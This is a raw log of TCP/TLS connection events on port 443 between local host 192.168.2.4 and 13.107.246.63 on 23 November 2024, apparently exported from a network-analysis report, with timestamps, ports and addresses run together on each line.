                                                                                                                                                                                  Nov 23, 2024 14:47:22.997433901 CET4434985513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.997517109 CET49855443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.997689962 CET49855443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.997705936 CET4434985513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:23.093884945 CET4434985113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:23.093951941 CET4434985113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:23.094006062 CET49851443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:23.094259024 CET49851443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:23.094264030 CET4434985113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:23.097731113 CET49856443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:23.097775936 CET4434985613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:23.097841978 CET49856443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:23.097987890 CET49856443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:23.098006964 CET4434985613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:23.167803049 CET4434985213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:23.167869091 CET4434985213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:23.167927980 CET49852443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:23.168292999 CET49852443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:23.168293953 CET49852443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:23.168324947 CET4434985213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:23.168349028 CET4434985213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:23.171475887 CET49857443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:23.171505928 CET4434985713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:23.171605110 CET49857443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:23.171739101 CET49857443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:23.171766043 CET4434985713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:24.633950949 CET4434985313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:24.635710001 CET49853443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:24.635745049 CET4434985313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:24.636192083 CET49853443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:24.636198997 CET4434985313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:24.830606937 CET4434985613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:24.831186056 CET49856443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:24.831218004 CET4434985613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:24.831665039 CET49856443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:24.831671000 CET4434985613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:24.855880976 CET4434985413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:24.859603882 CET49854443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:24.859621048 CET4434985413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:24.860034943 CET49854443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:24.860042095 CET4434985413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:24.877286911 CET4434985513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:24.879643917 CET49855443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:24.879653931 CET4434985513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:24.880044937 CET49855443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:24.880050898 CET4434985513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.020884037 CET4434985713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.021465063 CET49857443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.021476984 CET4434985713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.022095919 CET49857443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.022100925 CET4434985713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.067878008 CET4434985313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.067962885 CET4434985313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.068212032 CET49853443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.068248034 CET49853443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.068269968 CET4434985313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.068280935 CET49853443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.068289042 CET4434985313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.071343899 CET49858443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.071371078 CET4434985813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.071458101 CET49858443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.071631908 CET49858443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.071645975 CET4434985813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.267690897 CET4434985613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.267757893 CET4434985613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.267878056 CET49856443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.268358946 CET49856443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.268373013 CET4434985613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.268384933 CET49856443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.268390894 CET4434985613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.271374941 CET49859443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.271389961 CET4434985913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.271476030 CET49859443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.271658897 CET49859443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.271675110 CET4434985913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.321002007 CET4434985413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.321170092 CET4434985413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.321588993 CET49854443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.321635008 CET49854443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.321641922 CET4434985413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.321655989 CET49854443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.321660042 CET4434985413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.324635029 CET49860443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.324655056 CET4434986013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.324728966 CET49860443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.324907064 CET49860443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.324919939 CET4434986013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.341455936 CET4434985513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.341512918 CET4434985513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.341617107 CET49855443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.342082024 CET49855443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.342101097 CET4434985513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.342118979 CET49855443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.342124939 CET4434985513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.344593048 CET49861443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.344635963 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.344722033 CET49861443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.344871044 CET49861443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.344902992 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.475570917 CET4434985713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.475652933 CET4434985713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.475728035 CET49857443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.475908041 CET49857443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.475933075 CET4434985713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.475956917 CET49857443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.475970030 CET4434985713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.478909969 CET49862443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.478925943 CET4434986213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:25.479104996 CET49862443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.479296923 CET49862443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:25.479305983 CET4434986213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:26.862117052 CET4434985813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:26.862760067 CET49858443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:26.862790108 CET4434985813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:26.863260031 CET49858443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:26.863272905 CET4434985813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.161974907 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.162807941 CET49861443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.162842035 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.163475037 CET49861443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.163487911 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.168441057 CET4434986013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.168895960 CET49860443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.168911934 CET4434986013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.169554949 CET49860443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.169562101 CET4434986013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.184858084 CET4434985913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.185514927 CET49859443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.185553074 CET4434985913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.186026096 CET49859443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.186042070 CET4434985913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.268547058 CET4434986213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.269423962 CET49862443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.269448996 CET4434986213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.269984007 CET49862443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.269989014 CET4434986213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.307784081 CET4434985813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.307982922 CET4434985813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.308052063 CET49858443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.308094978 CET49858443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.308094978 CET49858443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.308115959 CET4434985813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.308126926 CET4434985813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.310791969 CET49863443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.310856104 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.310954094 CET49863443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.311103106 CET49863443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.311136961 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.605886936 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.605942011 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.606005907 CET49861443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.606220961 CET49861443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.606256962 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.606285095 CET49861443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.606302977 CET4434986113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.609245062 CET49864443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.609266043 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.609392881 CET49864443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.609472990 CET49864443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.609484911 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.615657091 CET4434986013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.615732908 CET4434986013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.615798950 CET49860443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.615956068 CET49860443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.615967989 CET4434986013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.615978003 CET49860443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.615983009 CET4434986013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.618530035 CET49865443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.618571043 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.618655920 CET49865443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.618802071 CET49865443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.618824005 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.638052940 CET4434985913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.638111115 CET4434985913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.638209105 CET49859443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.638288975 CET49859443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.638288975 CET49859443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.638333082 CET4434985913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.638392925 CET4434985913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.640197039 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.640208960 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.640346050 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.640453100 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.640463114 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.712304115 CET4434986213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.712371111 CET4434986213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.712430954 CET49862443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.712527990 CET49862443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.712532997 CET4434986213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.712543011 CET49862443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.712546110 CET4434986213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.714687109 CET49867443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.714704037 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:27.714776039 CET49867443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.714911938 CET49867443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:27.714922905 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.096807003 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.097460032 CET49863443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.097527981 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.097971916 CET49863443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.097987890 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.332513094 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.333115101 CET49865443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.333132029 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.333625078 CET49865443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.333631992 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.420047045 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.420579910 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.420593977 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.421015024 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.421020031 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.452503920 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.452924013 CET49864443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.452934980 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.453358889 CET49864443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.453362942 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.494903088 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.537713051 CET49867443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.537730932 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.538407087 CET49867443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.538414955 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.539843082 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.539908886 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.539961100 CET49863443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.543328047 CET49863443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.543342113 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.543359041 CET49863443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.543365955 CET4434986313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.547288895 CET49868443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.547339916 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.547418118 CET49868443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.547652960 CET49868443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.547667027 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.783303022 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.783375978 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.783452988 CET49865443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.783647060 CET49865443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.783654928 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.783668041 CET49865443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.783673048 CET4434986513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.786370993 CET49869443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.786381006 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.786433935 CET49869443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.786607981 CET49869443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.786621094 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.863930941 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.864001989 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.864078045 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.865092993 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.865120888 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.865130901 CET49866443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.865139008 CET4434986613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.868280888 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.868330002 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.868397951 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.869218111 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.869231939 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.905107975 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.905169964 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.905226946 CET49864443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.905370951 CET49864443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.905389071 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.905411959 CET49864443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.905416965 CET4434986413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.908008099 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.908026934 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.908102036 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.908261061 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.908276081 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.939344883 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.939420938 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.939486027 CET49867443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.939694881 CET49867443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.939702988 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.939718962 CET49867443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.939726114 CET4434986713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.942523003 CET49872443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.942543983 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:29.942621946 CET49872443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.942943096 CET49872443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:29.942954063 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:31.390671015 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:31.391354084 CET49868443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:31.391386032 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:31.391879082 CET49868443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:31.391884089 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:31.601819038 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:31.602351904 CET49869443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:31.602363110 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:31.602973938 CET49869443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:31.602982044 CET4434986913.107.246.63192.168.2.4
